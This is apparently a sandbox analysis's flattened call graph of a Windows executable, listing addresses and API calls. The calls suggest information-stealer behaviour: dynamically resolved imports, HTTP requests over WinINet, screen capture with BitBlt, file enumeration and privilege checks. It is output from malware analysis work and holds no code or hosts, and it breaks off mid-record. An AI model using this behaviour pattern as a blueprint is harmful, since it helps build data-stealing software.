40357c 7 API calls 18414->18415 18416 4186fa 18415->18416 18417 40357c 7 API calls 18416->18417 18418 41870b 18417->18418 18419 4039e8 21 API calls 18418->18419 18420 418713 GetModuleHandleA 18419->18420 18421 41872f 18420->18421 18422 41871f 18420->18422 18424 418733 18421->18424 18425 41874f 18421->18425 18423 4039e8 21 API calls 18422->18423 18426 418727 LoadLibraryA 18423->18426 18427 4039e8 21 API calls 18424->18427 18428 4039e8 21 API calls 18425->18428 18426->18421 18429 41873b 18427->18429 18430 418757 GetProcAddress 18428->18430 18431 4039e8 21 API calls 18429->18431 18432 4039e8 21 API calls 18430->18432 18433 418747 LoadLibraryA 18431->18433 18434 41876c GetProcAddress 18432->18434 18433->18425 18435 4039e8 21 API calls 18434->18435 18436 418781 GetProcAddress 18435->18436 18437 4039e8 21 API calls 18436->18437 18438 418796 GetProcAddress 18437->18438 18439 4039e8 21 API calls 18438->18439 18440 4187ab GetProcAddress 18439->18440 18441 4039e8 21 API calls 18440->18441 18442 4187c0 GetProcAddress 18441->18442 18443 4039e8 21 API calls 18442->18443 18444 4187d5 GetProcAddress 18443->18444 18445 4039e8 21 API calls 18444->18445 18446 4187e9 GetProcAddress 18445->18446 18447 4039e8 21 API calls 18446->18447 18448 418800 GetProcAddress 18447->18448 18449 41881c 18448->18449 18450 4188f2 InternetCrackUrlA 18449->18450 18451 418901 18450->18451 19260 4039f0 18451->19260 18453 418922 18454 418977 InternetOpenA 18453->18454 18457 4037dc 21 API calls 18453->18457 18455 418991 InternetConnectA 18454->18455 18456 418ad6 18454->18456 18455->18456 18472 4189d4 18455->18472 18458 418b28 18456->18458 18466 418ae5 18456->18466 18459 41895b 18457->18459 18460 403538 21 API calls 18458->18460 19267 417f6c 18459->19267 18463 418b33 18460->18463 18465 4034e4 7 API calls 18463->18465 18464 418969 18464->18454 18467 418b3b 18465->18467 19288 418124 18466->19288 18469 403508 7 API calls 18467->18469 18470 418b58 18469->18470 18471 403508 7 API calls 18470->18471 18473 418b65 18471->18473 18474 418a1c HttpOpenRequestA 18472->18474 18475 403508 7 API calls 18473->18475 18476 418ad0 InternetCloseHandle 18474->18476 18480 418a31 18474->18480 18477 418b72 18475->18477 18476->18456 18478 403508 7 API calls 18477->18478 18479 418b7f 18478->18479 18479->18057 18481 418a66 HttpSendRequestA 18480->18481 18481->18476 18484 418a79 18481->18484 18482 418a89 InternetReadFile 18483 4035d4 21 API calls 18482->18483 18483->18484 18484->18476 18484->18482 18485 403798 21 API calls 18484->18485 18485->18484 18487 407444 18486->18487 18488 4034e4 7 API calls 18487->18488 18492 407469 18488->18492 18489 4074d3 18490 403508 7 API calls 18489->18490 18491 4074ed 18490->18491 18496 406984 18491->18496 18492->18489 18493 4039f0 21 API calls 18492->18493 18494 4074b1 18493->18494 18494->18489 18495 4039f0 21 API calls 18494->18495 18495->18489 18497 4069a3 18496->18497 18498 4034e4 7 API calls 18497->18498 18499 4069b9 18498->18499 18500 406a64 18499->18500 18505 4036cc 21 API calls 18499->18505 18506 403798 21 API calls 18499->18506 18501 403508 7 API calls 18500->18501 18502 406a7e 18501->18502 18503 4034e4 7 API calls 18502->18503 18504 406a86 18503->18504 18504->18074 18505->18499 18506->18499 18508 406b00 18507->18508 18509 40357c 7 API calls 18508->18509 18511 406b1b 18509->18511 18510 406b6b 18512 403538 21 API calls 18510->18512 18511->18510 18513 4039e8 21 API calls 18511->18513 18514 406b76 18512->18514 18513->18511 18515 4034e4 7 API calls 18514->18515 18516 406b8b 18515->18516 18517 4034e4 7 API calls 18516->18517 18518 406b93 18517->18518 18519 40795c 18518->18519 18520 4047a8 26 API calls 18519->18520 18524 40797e 18520->18524 18521 4079df 18522 4047a8 26 API calls 18521->18522 18526 4079fa 18522->18526 18523 4047a8 26 API calls 18523->18524 18524->18521 18524->18523 18525 4039f0 21 API calls 18524->18525 18525->18524 18527 4039f0 21 API calls 18526->18527 18528 407a20 18527->18528 18528->18087 18530 4080d3 18529->18530 18531 40795c 26 API calls 18530->18531 18532 4080f3 18531->18532 18533 4034e4 7 API calls 18532->18533 18534 408108 18533->18534 18535 408328 18534->18535 18536 408330 18535->18536 18537 406c4c 33 API calls 18536->18537 18538 40836d 18537->18538 18539 406258 21 API calls 18538->18539 18540 408378 18539->18540 18541 406258 21 API calls 18540->18541 18542 408383 18541->18542 18543 403e1c 3 API calls 18542->18543 18544 4083a8 18543->18544 19467 4062d8 18544->19467 18547 403bbc 3 API calls 18548 4083bd 18547->18548 18549 4083c6 CreateDirectoryW 18548->18549 19472 4081a0 18549->19472 18551 4083d6 19491 403db8 18551->19491 18556 408444 18565 408466 18556->18565 19504 4040b0 18556->19504 18557 4083fc 18558 403e1c 3 API calls 18557->18558 18559 408416 18558->18559 18560 4062d8 3 API calls 18559->18560 18561 408421 18560->18561 18564 403bbc 3 API calls 18561->18564 18562 403e1c 3 API calls 18569 408495 18562->18569 18566 40842b 18564->18566 18565->18562 18567 408434 CreateDirectoryW 18566->18567 18568 4081a0 33 API calls 18567->18568 18568->18556 18570 4084b3 SetCurrentDirectoryW 18569->18570 18571 4084ce 18570->18571 18572 403db8 3 API calls 18571->18572 18573 4084db 18572->18573 18574 4084e3 LoadLibraryExW 18573->18574 18575 4084f4 18574->18575 18576 408737 18574->18576 18577 408120 21 API calls 18575->18577 18579 403508 7 API calls 18576->18579 18578 408501 18577->18578 18581 408509 GetProcAddress 18578->18581 18580 408751 18579->18580 18582 403b98 SysFreeString 18580->18582 18583 408120 21 API calls 18581->18583 18584 40875e 18582->18584 18585 408524 18583->18585 18586 403508 7 API calls 18584->18586 18588 40852c GetProcAddress 18585->18588 18587 40876b 18586->18587 18589 403b98 SysFreeString 18587->18589 18590 408120 21 API calls 18588->18590 18591 408778 18589->18591 18592 408547 18590->18592 18593 4034e4 7 API calls 18591->18593 18595 40854f GetProcAddress 18592->18595 18594 408780 18593->18594 18594->18176 18596 408120 21 API calls 18595->18596 18597 40856a 18596->18597 18598 408572 GetProcAddress 18597->18598 18599 408120 21 API calls 18598->18599 18600 40858d 18599->18600 18601 408595 GetProcAddress 18600->18601 18602 408120 21 API calls 18601->18602 18603 4085b0 18602->18603 18604 4085b8 GetProcAddress 18603->18604 18605 408120 21 API calls 18604->18605 18606 4085d3 18605->18606 18607 4085db GetProcAddress 18606->18607 18608 408120 21 API calls 18607->18608 18609 4085f6 18608->18609 18610 4085fe GetProcAddress 18609->18610 18611 408120 21 API calls 18610->18611 18612 408619 18611->18612 18613 408621 GetProcAddress 18612->18613 18614 408120 21 API calls 18613->18614 18615 40863c 18614->18615 18616 408644 GetProcAddress 18615->18616 18617 408120 21 API calls 18616->18617 18618 40865f 18617->18618 18619 408667 GetProcAddress 18618->18619 18620 408120 21 API calls 18619->18620 18621 408682 18620->18621 18622 40868a GetProcAddress 18621->18622 18623 408120 21 API calls 18622->18623 18624 4086a5 18623->18624 18625 4086ad GetProcAddress 18624->18625 18625->18576 18626 4086c4 18625->18626 18626->18576 19522 409208 18627->19522 18649 4035d4 21 API calls 18648->18649 18650 4036d9 18649->18650 18650->18033 18653 4053e8 18651->18653 18652 4054b7 18652->18176 18653->18652 18654 403850 21 API calls 18653->18654 18654->18653 20590 40f944 18655->20590 18665 408136 18664->18665 18666 403538 21 API calls 18664->18666 18665->18176 18666->18665 18668 4034e4 7 API calls 18667->18668 18669 405534 18668->18669 18670 405567 18669->18670 18671 403850 21 API calls 18669->18671 18670->18176 18671->18669 21510 4132e0 18672->21510 18676 4040f4 SysAllocStringLen 18675->18676 18677 415eb7 18676->18677 21828 415610 18677->21828 18685 4050de 18684->18685 22017 40503c 18685->22017 18688 403850 21 API calls 18689 405114 18688->18689 18690 403508 7 API calls 18689->18690 18691 40512e 18690->18691 18691->18176 18693 4040f4 SysAllocStringLen 18692->18693 18694 414d03 18693->18694 18695 4062d8 3 API calls 18694->18695 18696 414d24 18695->18696 18697 403db8 3 API calls 18696->18697 18704 414d38 18697->18704 18698 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 18698->18704 18699 4076b0 3 API calls 18699->18704 18700 414e45 18702 403b98 SysFreeString 18700->18702 18701 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 18701->18704 18703 414e6c 18702->18703 18705 4034e4 7 API calls 18703->18705 18704->18698 18704->18699 18704->18700 18704->18701 18708 40ddb0 30 API calls 18704->18708 18706 414e77 18705->18706 18707 403b98 SysFreeString 18706->18707 18709 414e87 18707->18709 18708->18704 18710 403b98 SysFreeString 18709->18710 18711 414e94 18710->18711 18711->18176 18713 414411 18712->18713 18713->18713 18714 4040f4 SysAllocStringLen 18713->18714 18715 41442f 18714->18715 18716 4040f4 SysAllocStringLen 18715->18716 18717 414437 18716->18717 18718 4040f4 SysAllocStringLen 18717->18718 18719 41443f 18718->18719 18720 4040f4 SysAllocStringLen 18719->18720 18721 414447 18720->18721 18722 4062d8 3 API calls 18721->18722 18723 414468 18722->18723 18724 40795c 26 API calls 18723->18724 18725 414497 18724->18725 18726 40795c 26 API calls 18725->18726 18728 4144b8 18726->18728 18727 414538 18729 403b98 SysFreeString 18727->18729 18728->18727 18732 4047a8 26 API calls 18728->18732 18730 414af6 18729->18730 18731 403508 7 API calls 18730->18731 18733 414b06 18731->18733 18734 4144e5 18732->18734 18735 403b80 SysFreeString 18733->18735 18737 40781c 8 API calls 18734->18737 18736 414b11 18735->18736 18738 403508 7 API calls 18736->18738 18740 414506 18737->18740 18739 414b21 18738->18739 18741 403b98 SysFreeString 18739->18741 18742 403bbc 3 API calls 18740->18742 18743 414b31 18741->18743 18768 414512 18742->18768 18744 4034e4 7 API calls 18743->18744 18745 414b3c 18744->18745 18746 403b98 SysFreeString 18745->18746 18747 414b4c 18746->18747 18748 403508 7 API calls 18747->18748 18749 414b5c 18748->18749 18750 403b98 SysFreeString 18749->18750 18751 414b6c 18750->18751 18752 4034e4 7 API calls 18751->18752 18753 414b77 18752->18753 18754 403b80 SysFreeString 18753->18754 18755 414b82 18754->18755 18757 4034e4 7 API calls 18755->18757 18756 403b80 SysFreeString 18756->18768 18758 414b8d 18757->18758 18759 403b98 SysFreeString 18758->18759 18760 414b9d 18759->18760 18761 403508 7 API calls 18760->18761 18762 414bad 18761->18762 18764 403b80 SysFreeString 18762->18764 18763 403db8 3 API calls 18763->18768 18765 414bb8 18764->18765 18767 4047b4 9 API calls 18765->18767 18766 40781c 8 API calls 18766->18768 18769 414bc6 18767->18769 18768->18727 18768->18756 18768->18763 18768->18766 18771 4145c4 FindFirstFileW 18768->18771 18783 414aae FindNextFileW 18768->18783 18784 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 18768->18784 18787 4149b1 GetFileAttributesW 18768->18787 18788 406120 21 API calls 18768->18788 18789 4047a8 26 API calls 18768->18789 18790 403bbc 3 API calls 18768->18790 18791 40ddb0 30 API calls 18768->18791 18792 406318 21 API calls 18768->18792 18793 40770c 6 API calls 18768->18793 18794 403f34 SysAllocStringLen SysAllocStringLen SysFreeString 18768->18794 18795 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 18768->18795 22025 4141b8 18768->22025 18770 403b80 SysFreeString 18769->18770 18772 414bce 18770->18772 18771->18768 18773 4047b4 9 API calls 18772->18773 18774 414bdc 18773->18774 18775 403b98 SysFreeString 18774->18775 18776 414be9 18775->18776 18777 4047b4 9 API calls 18776->18777 18778 414bf7 18777->18778 18779 403b98 SysFreeString 18778->18779 18780 414c04 18779->18780 18783->18768 18785 414ac3 FindClose 18783->18785 18784->18768 18785->18768 18787->18768 18787->18783 18788->18768 18789->18768 18790->18783 18791->18768 18792->18768 18793->18768 18794->18768 18795->18768 18797 414f48 18796->18797 18797->18797 18798 4040f4 SysAllocStringLen 18797->18798 18799 414f5e 18798->18799 18800 407500 8 API calls 18799->18800 18801 414f92 18800->18801 22084 4070bc 18801->22084 18803 414fab 18804 403db8 3 API calls 18803->18804 18806 414fcd 18804->18806 18805 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 18805->18806 18806->18805 18807 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 18806->18807 18808 40ddb0 30 API calls 18806->18808 18809 415078 18806->18809 18807->18806 18808->18806 18810 403db8 3 API calls 18809->18810 18811 415096 18810->18811 18812 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 18811->18812 18813 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 18811->18813 18814 40ddb0 30 API calls 18811->18814 18815 415141 18811->18815 18812->18811 18813->18811 18814->18811 18816 403b98 SysFreeString 18815->18816 18817 415168 18816->18817 18818 4034e4 7 API calls 18817->18818 18819 415173 18818->18819 18820 403b98 SysFreeString 18819->18820 18821 415183 18820->18821 18822 4034e4 7 API calls 18821->18822 18823 41518e 18822->18823 18824 403b98 SysFreeString 18823->18824 18825 41519e 18824->18825 18826 403b98 SysFreeString 18825->18826 18827 4151ab 18826->18827 18827->18176 18829 417ac5 18828->18829 18830 4178e9 18828->18830 18829->18176 18830->18829 18831 417992 GetDC CreateCompatibleDC CreateCompatibleBitmap SelectObject BitBlt 18830->18831 18832 4179e3 18831->18832 22104 4177e0 18832->22104 18836 4035d4 21 API calls 18837 417a94 GlobalUnWire DeleteObject DeleteDC ReleaseDC 18836->18837 18837->18829 18840 40700b 18839->18840 18841 403bbc 3 API calls 18840->18841 18842 407023 18841->18842 18843 403b80 SysFreeString 18842->18843 18844 407038 18843->18844 18844->18176 18851 403be8 18845->18851 18846 403c01 18849 403b80 SysFreeString 18846->18849 18847 403c0a 18848 403c3d 18847->18848 22110 403624 MultiByteToWideChar 18847->22110 18853 4040b0 3 API calls 18848->18853 18852 403c08 18849->18852 18851->18846 18851->18847 18852->18226 18855 403c48 18853->18855 18854 403c28 18854->18848 18856 403c2e 18854->18856 22111 403624 MultiByteToWideChar 18855->22111 18858 403c74 4 API calls 18856->18858 18858->18852 18859 403c56 18859->18852 18860 4040b0 3 API calls 18859->18860 18860->18852 18863 403d69 18861->18863 18862 403db1 18862->18226 18863->18862 18864 403b58 2 API calls 18863->18864 18865 403d83 18864->18865 18866 403b70 SysFreeString 18865->18866 18866->18862 18868 4040f4 SysAllocStringLen 18867->18868 18869 407833 18868->18869 18870 403bbc 3 API calls 18869->18870 18871 40784b 18870->18871 18872 4070bc 8 API calls 18871->18872 18873 407860 18872->18873 18874 403bbc 3 API calls 18873->18874 18875 40786a 18874->18875 18876 4070bc 8 API calls 18875->18876 18877 40787f 18876->18877 18878 403bbc 3 API calls 18877->18878 18879 407889 18878->18879 18880 4070bc 8 API calls 18879->18880 18881 40789b 18880->18881 18882 403bbc 3 API calls 18881->18882 18883 4078a5 18882->18883 18884 403b98 SysFreeString 18883->18884 18885 4078bf 18884->18885 18885->18226 18887 417298 18886->18887 18887->18887 18888 406c4c 33 API calls 18887->18888 18889 4172bd 18888->18889 18890 403850 21 API calls 18889->18890 18891 4172d1 18890->18891 22112 416f88 GetModuleFileNameA 18891->22112 18893 4172e2 18894 403850 21 API calls 18893->18894 18895 4172f6 18894->18895 22114 407a4c 18895->22114 18898 403850 21 API calls 18899 41731a 18898->18899 22136 4066c0 18899->22136 18902 406bb4 8 API calls 18903 417340 18902->18903 18904 403e1c 3 API calls 18903->18904 18905 417355 18904->18905 18906 4037dc 21 API calls 18905->18906 18907 41736e 18906->18907 18908 406610 5 API calls 18907->18908 18909 417384 18908->18909 18910 4065cc 6 API calls 18909->18910 18911 417394 18910->18911 18912 403e1c 3 API calls 18911->18912 18913 4173ae 18912->18913 18914 4037dc 21 API calls 18913->18914 18915 4173c7 18914->18915 18916 4173d2 GetSystemMetrics 18915->18916 18917 406fdc 4 API calls 18916->18917 18918 4173e4 GetSystemMetrics 18917->18918 18919 406fdc 4 API calls 18918->18919 18920 4173fb 18919->18920 18921 403e1c 3 API calls 18920->18921 18922 417410 18921->18922 22143 416fb8 18922->22143 18977 403b9e 18976->18977 18978 403ba4 SysFreeString 18977->18978 18979 403bb6 18977->18979 18978->18977 18979->18029 18981 40350e 18980->18981 18982 403534 18981->18982 18983 402550 7 API calls 18981->18983 18984 403b80 18982->18984 18983->18981 18985 403b94 18984->18985 18986 403b86 SysFreeString 18984->18986 18985->18049 18986->18985 18988 40422d 18987->18988 19008 404262 18987->19008 18989 404242 18988->18989 18990 404267 18988->18990 18991 404284 18989->18991 18992 404246 18989->18992 18993 404278 18990->18993 18994 40426e 18990->18994 18996 404292 18991->18996 18997 40428b 18991->18997 18998 40424a 18992->18998 18999 40429b 18992->18999 18995 403508 7 API calls 18993->18995 19000 4034e4 7 API calls 18994->19000 18995->19008 19002 403b98 SysFreeString 18996->19002 19001 403b80 SysFreeString 18997->19001 19003 4042aa 18998->19003 19004 40424e 18998->19004 18999->19008 22352 40420c 18999->22352 19000->19008 19001->19008 19002->19008 19007 404224 9 API calls 19003->19007 19003->19008 19006 4042c8 19004->19006 19011 404252 19004->19011 19006->19008 22357 4041d8 19006->22357 19007->19003 19008->18156 19010 4047b4 9 API calls 19010->19011 19011->19008 19011->19010 19013 402555 19012->19013 19014 402568 19012->19014 19013->19014 19016 402614 19013->19016 19014->18281 19017 4025cc 19016->19017 19020 4025c0 19017->19020 19023 4034cc 19020->19023 19024 4033f4 7 API calls 19023->19024 19025 4025cb 19024->19025 19025->19014 19027 40354c 19026->19027 19028 40353c 19026->19028 19029 40357a 19027->19029 19031 402550 7 API calls 19027->19031 19028->19027 19043 4035a8 19028->19043 19032 407b78 19029->19032 19031->19029 19036 407bb7 19032->19036 19033 407c08 CheckTokenMembership 19034 407c1f FreeSid 19033->19034 19034->18293 19036->19033 19036->19034 19038 407c9e 19037->19038 19039 407ca4 LookupAccountSidA CheckTokenMembership 19038->19039 19040 407d1d 19038->19040 19041 407cf2 FreeSid 19039->19041 19040->18305 19041->18305 19044 4035d0 19043->19044 19045 4035ac 19043->19045 19044->19027 19048 402530 19045->19048 19049 402535 19048->19049 19050 402548 19048->19050 19054 401f5c 19049->19054 19050->19027 19051 40253b 19051->19050 19052 402614 7 API calls 19051->19052 19052->19050 19055 401f70 19054->19055 19057 401f75 19054->19057 19065 401870 RtlInitializeCriticalSection 19055->19065 19058 401fa2 RtlEnterCriticalSection 19057->19058 19059 401fac 19057->19059 19062 401f81 19057->19062 19058->19059 19059->19062 19072 401e68 19059->19072 19062->19051 19063 4020d7 19063->19051 19064 4020cd RtlLeaveCriticalSection 19064->19063 19066 401894 RtlEnterCriticalSection 19065->19066 19067 40189e 19065->19067 19066->19067 19068 4018bc LocalAlloc 19067->19068 19069 4018d6 19068->19069 19070 401925 19069->19070 19071 40191b RtlLeaveCriticalSection 19069->19071 19070->19057 19071->19070 19075 401e78 19072->19075 19073 401ea4 19077 401ec8 19073->19077 19083 401c7c 19073->19083 19075->19073 19075->19077 19078 401ddc 19075->19078 19077->19063 19077->19064 19087 401630 19078->19087 19080 401dec 19081 401df9 19080->19081 19096 401d50 19080->19096 19081->19075 19084 401cd1 19083->19084 19085 401c9a 19083->19085 19084->19085 19132 401bcc 19084->19132 19085->19077 19090 40164c 19087->19090 19089 401656 19111 40151c 19089->19111 19090->19089 19092 401662 19090->19092 19094 4016a7 19090->19094 19103 401388 19090->19103 19115 401284 19090->19115 19092->19080 19119 401464 19094->19119 19123 401d04 19096->19123 19099 401284 LocalAlloc 19100 401d74 19099->19100 19102 401d7c 19100->19102 19127 401aa8 19100->19127 19102->19081 19104 401397 VirtualAlloc 19103->19104 19106 4013c4 19104->19106 19107 4013e7 19104->19107 19108 40123c LocalAlloc 19106->19108 19107->19090 19109 4013d0 19108->19109 19109->19107 19110 4013d4 VirtualFree 19109->19110 19110->19107 19113 401562 19111->19113 19112 401592 19112->19092 19113->19112 19114 40157e VirtualAlloc 19113->19114 19114->19112 19114->19113 19116 4012a0 19115->19116 19117 40123c LocalAlloc 19116->19117 19118 4012e6 19117->19118 19118->19090 19122 401493 19119->19122 19120 4014ec 19120->19092 19121 4014c0 VirtualFree 19121->19122 19122->19120 19122->19121 19124 401d16 19123->19124 19125 401d0d 19123->19125 19124->19099 19125->19124 19126 401ad8 9 API calls 19125->19126 19126->19124 19128 401ac5 19127->19128 19129 401ab6 19127->19129 19128->19102 19130 401c7c 9 API calls 19129->19130 19131 401ac3 19130->19131 19131->19102 19134 401be2 19132->19134 19133 401c6a 19133->19085 19134->19133 19135 401c21 19134->19135 19136 401c0d 19134->19136 19137 4017e4 3 API calls 19135->19137 19145 4017e4 19136->19145 19139 401c1f 19137->19139 19139->19133 19140 401aa8 9 API calls 19139->19140 19141 401c45 19140->19141 19142 401c5f 19141->19142 19155 401afc 19141->19155 19160 4012f4 19142->19160 19146 40180a 19145->19146 19154 401863 19145->19154 19147 4015b0 VirtualFree 19146->19147 19148 401817 19147->19148 19149 401284 LocalAlloc 19148->19149 19150 401827 19149->19150 19151 40183e 19150->19151 19152 401464 VirtualFree 19150->19152 19153 4012f4 LocalAlloc 19151->19153 19151->19154 19152->19151 19153->19154 19154->19139 19156 401b01 19155->19156 19157 401b0f 19155->19157 19158 401ad8 9 API calls 19156->19158 19157->19142 19159 401b0e 19158->19159 19159->19142 19161 4012ff 19160->19161 19162 40131a 19161->19162 19163 40123c LocalAlloc 19161->19163 19162->19133 19163->19162 19165 403b80 SysFreeString 19164->19165 19166 406e7f 19165->19166 19195 406dac 19166->19195 19223 407500 19169->19223 19173 406601 19172->19173 19174 4065ef 19172->19174 19176 4065ff 19173->19176 19177 403b80 SysFreeString 19173->19177 19175 403d10 4 API calls 19174->19175 19175->19176 19176->18325 19177->19176 19179 40662f 19178->19179 19180 406633 19179->19180 19181 406645 19179->19181 19182 403d10 4 API calls 19180->19182 19183 403b80 SysFreeString 19181->19183 19184 406643 19182->19184 19183->19184 19184->18327 19186 40626a 19185->19186 19235 4061e0 19186->19235 19190 40628c 19191 4062a8 19190->19191 19192 4037dc 21 API calls 19190->19192 19193 4034e4 7 API calls 19191->19193 19192->19190 19194 4062bd 19193->19194 19194->18330 19196 406dc6 19195->19196 19197 4040f4 SysAllocStringLen 19195->19197 19207 4040f4 19196->19207 19197->19196 19199 406dce 19200 406dff RegOpenKeyExW 19199->19200 19211 403d3c 19200->19211 19204 406e44 19205 403b98 SysFreeString 19204->19205 19206 406e5e 19205->19206 19206->18315 19208 4040fa SysAllocStringLen 19207->19208 19210 404110 19207->19210 19209 403b50 19208->19209 19208->19210 19209->19207 19210->19199 19212 403d40 RegQueryValueExW 19211->19212 19213 403d10 19212->19213 19214 403c74 19213->19214 19215 403b80 19214->19215 19216 403c7c SysAllocStringLen 19214->19216 19217 403b94 19215->19217 19218 403b86 SysFreeString 19215->19218 19219 403b50 19216->19219 19220 403c8c SysFreeString 19216->19220 19217->19204 19218->19217 19221 404110 19219->19221 19222 4040fa SysAllocStringLen 19219->19222 19220->19204 19221->19204 19222->19219 19222->19221 19224 4040f4 SysAllocStringLen 19223->19224 19225 40751a 19224->19225 19226 4040f4 SysAllocStringLen 19225->19226 19227 407522 19226->19227 19228 407579 RegOpenKeyExW 19227->19228 19229 407546 19227->19229 19228->19229 19230 40759d RegQueryValueExW 19229->19230 19231 403d10 4 API calls 19230->19231 19232 4075be 19231->19232 19233 403b98 SysFreeString 19232->19233 19234 406bce 19233->19234 19234->18319 19236 4061f1 19235->19236 19237 4034e4 7 API calls 19236->19237 19238 406249 19237->19238 19239 4067e8 19238->19239 19240 4067ed 19239->19240 19243 4035d4 19240->19243 19244 4035a8 21 API calls 19243->19244 19245 4035e4 19244->19245 19246 4034e4 7 API calls 19245->19246 19247 4035fc 19246->19247 19247->19190 19249 403acd 19248->19249 19253 403afd 19248->19253 19251 4035a8 21 API calls 19249->19251 19252 403ad9 19249->19252 19250 4034e4 7 API calls 19250->19252 19251->19253 19252->18356 19253->19250 19255 40399c 19254->19255 19256 4035a8 21 API calls 19255->19256 19257 4039d7 19255->19257 19258 4039b3 19256->19258 19257->18408 19258->19257 19259 402550 7 API calls 19258->19259 19259->19257 19261 403a22 19260->19261 19262 4039f5 19260->19262 19263 4034e4 7 API calls 19261->19263 19262->19261 19264 403a09 19262->19264 19266 403a18 19263->19266 19265 4035d4 21 API calls 19264->19265 19265->19266 19266->18453 19268 417f8b 19267->19268 19269 4034e4 7 API calls 19268->19269 19270 417fa1 19269->19270 19345 4047a8 19270->19345 19272 418088 19273 4180b1 19272->19273 19274 41808c 19272->19274 19358 417dcc 19273->19358 19276 4037dc 21 API calls 19274->19276 19278 4180a0 19276->19278 19281 418688 60 API calls 19278->19281 19279 4180af 19282 4034e4 7 API calls 19279->19282 19280 417fbc 19280->19272 19348 417e80 19280->19348 19281->19279 19283 4180d0 19282->19283 19371 4047b4 19283->19371 19286 4034e4 7 API calls 19287 4180e6 19286->19287 19287->18464 19289 41816c 19288->19289 19290 40357c 7 API calls 19289->19290 19291 4181a7 19290->19291 19292 4039e8 21 API calls 19291->19292 19293 4181af GetModuleHandleA 19292->19293 19294 4181cb 19293->19294 19295 4181bb 19293->19295 19297 4039e8 21 API calls 19294->19297 19296 4039e8 21 API calls 19295->19296 19298 4181c3 LoadLibraryA 19296->19298 19299 4181d3 GetProcAddress 19297->19299 19298->19294 19300 4039e8 21 API calls 19299->19300 19301 4181ea GetProcAddress 19300->19301 19302 4039e8 21 API calls 19301->19302 19303 418201 GetProcAddress 19302->19303 19304 4039e8 21 API calls 19303->19304 19305 418218 GetProcAddress 19304->19305 19306 4039e8 21 API calls 19305->19306 19307 41822f GetProcAddress 19306->19307 19308 4039e8 21 API calls 19307->19308 19309 418246 GetProcAddress 19308->19309 19310 4039e8 21 API calls 19309->19310 19311 41825d GetProcAddress 19310->19311 19312 4039e8 21 API calls 19311->19312 19313 418274 GetProcAddress 19312->19313 19314 4184e2 19313->19314 19322 41828b 19313->19322 19315 403b98 SysFreeString 19314->19315 19316 4184ff 19315->19316 19317 4034e4 7 API calls 19316->19317 19318 41850a 19317->19318 19319 403b98 SysFreeString 19318->19319 19320 41851a 19319->19320 19321 403508 7 API calls 19320->19321 19323 418527 19321->19323 19322->19314 19324 4034e4 7 API calls 19322->19324 19325 403508 7 API calls 19323->19325 19327 4182fb 19324->19327 19326 418534 19325->19326 19326->18458 19327->19314 19328 403850 21 API calls 19327->19328 19329 4183ce 19328->19329 19330 417d60 4 API calls 19329->19330 19331 4183f8 19330->19331 19332 403e1c 3 API calls 19331->19332 19333 418427 19332->19333 19334 4039e8 21 API calls 19333->19334 19335 418448 19334->19335 19336 4034e4 7 API calls 19335->19336 19339 418458 19336->19339 19337 4034e4 7 API calls 19337->19339 19338 4035d4 21 API calls 19338->19339 19339->19337 19339->19338 19340 403798 21 API calls 19339->19340 19341 4184a8 19339->19341 19340->19339 19342 4039f0 21 API calls 19341->19342 19343 4184d7 19342->19343 19344 403538 21 API calls 19343->19344 19344->19314 19377 40461c 19345->19377 19349 417e97 LoadLibraryA GetProcAddress 19348->19349 19444 403980 19348->19444 19351 417ec2 19349->19351 19357 417edd 19349->19357 19352 402530 21 API calls 19351->19352 19354 417ed1 19352->19354 19353 4034e4 7 API calls 19355 417f21 19353->19355 19356 402530 21 API calls 19354->19356 19355->19280 19356->19357 19357->19353 19446 417d60 19358->19446 19361 417d60 4 API calls 19362 417e0d 19361->19362 19363 417d60 4 API calls 19362->19363 19364 417e22 19363->19364 19365 417d60 4 API calls 19364->19365 19366 417e37 19365->19366 19452 403e1c 19366->19452 19372 4047ec 19371->19372 19374 4047ba 19371->19374 19372->19286 19373 4047e4 19375 402550 7 API calls 19373->19375 19374->19372 19374->19373 19376 404224 9 API calls 19374->19376 19375->19372 19376->19373 19378 40463b 19377->19378 19382 404655 19377->19382 19379 404646 19378->19379 19381 402614 7 API calls 19378->19381 19391 404614 19379->19391 19381->19379 19383 40469f 19382->19383 19384 402614 7 API calls 19382->19384 19385 402530 21 API calls 19383->19385 19388 4046ac 19383->19388 19384->19383 19386 4046eb 19385->19386 19386->19388 19394 4045fc 19386->19394 19387 404650 19387->19280 19388->19387 19390 40461c 26 API calls 19388->19390 19390->19388 19392 4047b4 9 API calls 19391->19392 19393 404619 19392->19393 19393->19387 19397 404444 19394->19397 19396 404607 19396->19388 19398 404459 19397->19398 19399 40447f 19397->19399 19400 4044a1 19398->19400 19401 40445e 19398->19401 19402 403538 21 API calls 19399->19402 19411 40449c 19399->19411 19400->19411 19416 403bbc 19400->19416 19404 404463 19401->19404 19405 4044b5 19401->19405 19402->19399 19407 404468 19404->19407 19408 4044c9 19404->19408 19405->19411 19426 404310 19405->19426 19409 4044ea 19407->19409 19410 40446d 19407->19410 19408->19411 19412 404444 26 API calls 19408->19412 19409->19411 19431 404328 19409->19431 19410->19399 19410->19411 19414 40451b 19410->19414 19411->19396 19412->19408 19414->19411 19440 4047f0 19414->19440 19417 403b80 19416->19417 19418 403bc4 19416->19418 19420 403b94 19417->19420 19421 403b86 SysFreeString 19417->19421 19418->19417 19419 403bcf SysReAllocStringLen 19418->19419 19422 403b50 19419->19422 19423 403bdf 19419->19423 19420->19400 19421->19420 19424 404110 19422->19424 19425 4040fa SysAllocStringLen 19422->19425 19423->19400 19424->19400 19425->19422 19425->19424 19427 404320 19426->19427 19428 404319 19426->19428 19429 402614 7 API calls 19427->19429 19428->19405 19430 404327 19429->19430 19430->19405 19435 404342 19431->19435 19432 403538 21 API calls 19432->19435 19433 403bbc 3 API calls 19433->19435 19434 404310 7 API calls 19434->19435 19435->19432 19435->19433 19435->19434 19436 40442e 19435->19436 19437 404444 26 API calls 19435->19437 19438 404328 26 API calls 19435->19438 19439 4047f0 9 API calls 19435->19439 19436->19409 19437->19435 19438->19435 19439->19435 19442 4047f7 19440->19442 19441 404811 19441->19414 19442->19441 19443 4047b4 9 API calls 19442->19443 19443->19441 19445 403984 19444->19445 19445->19349 19447 